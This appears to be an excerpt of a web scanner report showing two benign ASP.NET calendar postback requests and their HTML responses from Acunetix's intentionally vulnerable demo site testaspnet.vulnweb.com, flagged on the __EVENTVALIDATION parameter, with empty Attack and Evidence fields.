Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1133 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,133 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8202&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgDABSgrT9oIZGRkWjLrhJ7SDtNBA9mZcv6Y%2FRduTRE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL%2B%2FJTRDgK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w%2FOoXkDle5%2BsmuGzDAIVT4SkaIdMg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:29:51 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgDABSgrT9oIZGRkWjLrhJ7SDtNBA9mZcv6Y/RduTRE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL+/JTRDgK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w/OoXkDle5+smuGzDAIVT4SkaIdMg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:White" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1167 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,167 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8158&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgDA2N2XLNoIZGRkw4pC9cUYGMhdgb5Evxkqoj9fjjs%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL%2B3cGIAgK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPY8L%2B1n3eQMr%2FS01UW5AzumCB68s%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:03:51 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgDA2N2XLNoIZGRkw4pC9cUYGMhdgb5Evxkqoj9fjjs=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL+3cGIAgK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPY8L+1n3eQMr/S01UW5AzumCB68s=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:White" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
